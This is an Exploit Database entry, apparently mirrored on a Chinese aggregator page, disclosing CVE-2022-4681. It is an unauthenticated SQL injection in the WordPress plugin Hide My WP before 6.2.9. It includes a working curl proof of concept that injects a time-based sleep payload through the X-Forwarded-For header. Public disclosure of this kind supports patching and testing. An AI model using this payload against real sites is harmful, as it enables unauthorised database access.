Hide My WP < 6.2.9 - Unauthenticated SQLi

Exploit Database
45 阅读

作者： Xenofon Vassilakopoulos

日期： 2024-03-10
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/51871/

# Exploit Title: WordPress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi 
# Publication Date: 2023-01-11
# Original Researcher: Xenofon Vassilakopoulos
# Exploit Author: Xenofon Vassilakopoulos
# Submitter: Xenofon Vassilakopoulos
# Vendor Homepage: https://wpwave.com/
# Version: Hide My WP v6.2.8 and prior
# Tested on: Hide My WP v6.2.7
# Impact: Database Access
# CVE: CVE-2022-4681
# CWE: CWE-89
# CVSS Score: 8.6 (high)

## Description

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.


## Proof of Concept

curl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"

last Exploits
Hide My WP < 6.2.9 - Unauthenticated SQLi的更多信息

MyBB 1.4.10 – ‘tags.php’ Cross-Site Scripting：
Biometric Shift Employee Management System 3.0 – Local File Disclosure：
CMS Made Simple 2.2.14 – Authenticated Arbitrary File Upload：
PHPortal 1.2 – ‘gunaysoft.php’ Remote File Inclusion：
Cisco Catalyst 3850 Series Device Manager – Cross-Site Request Forgery：
Joomla! Component Maian Media – ‘uploadhandler.php’ Arbitrary File Upload：
Consumer Review Script 1.0 – SQL Injection：
Justdial Clone Script – ‘fid’ SQL Injection：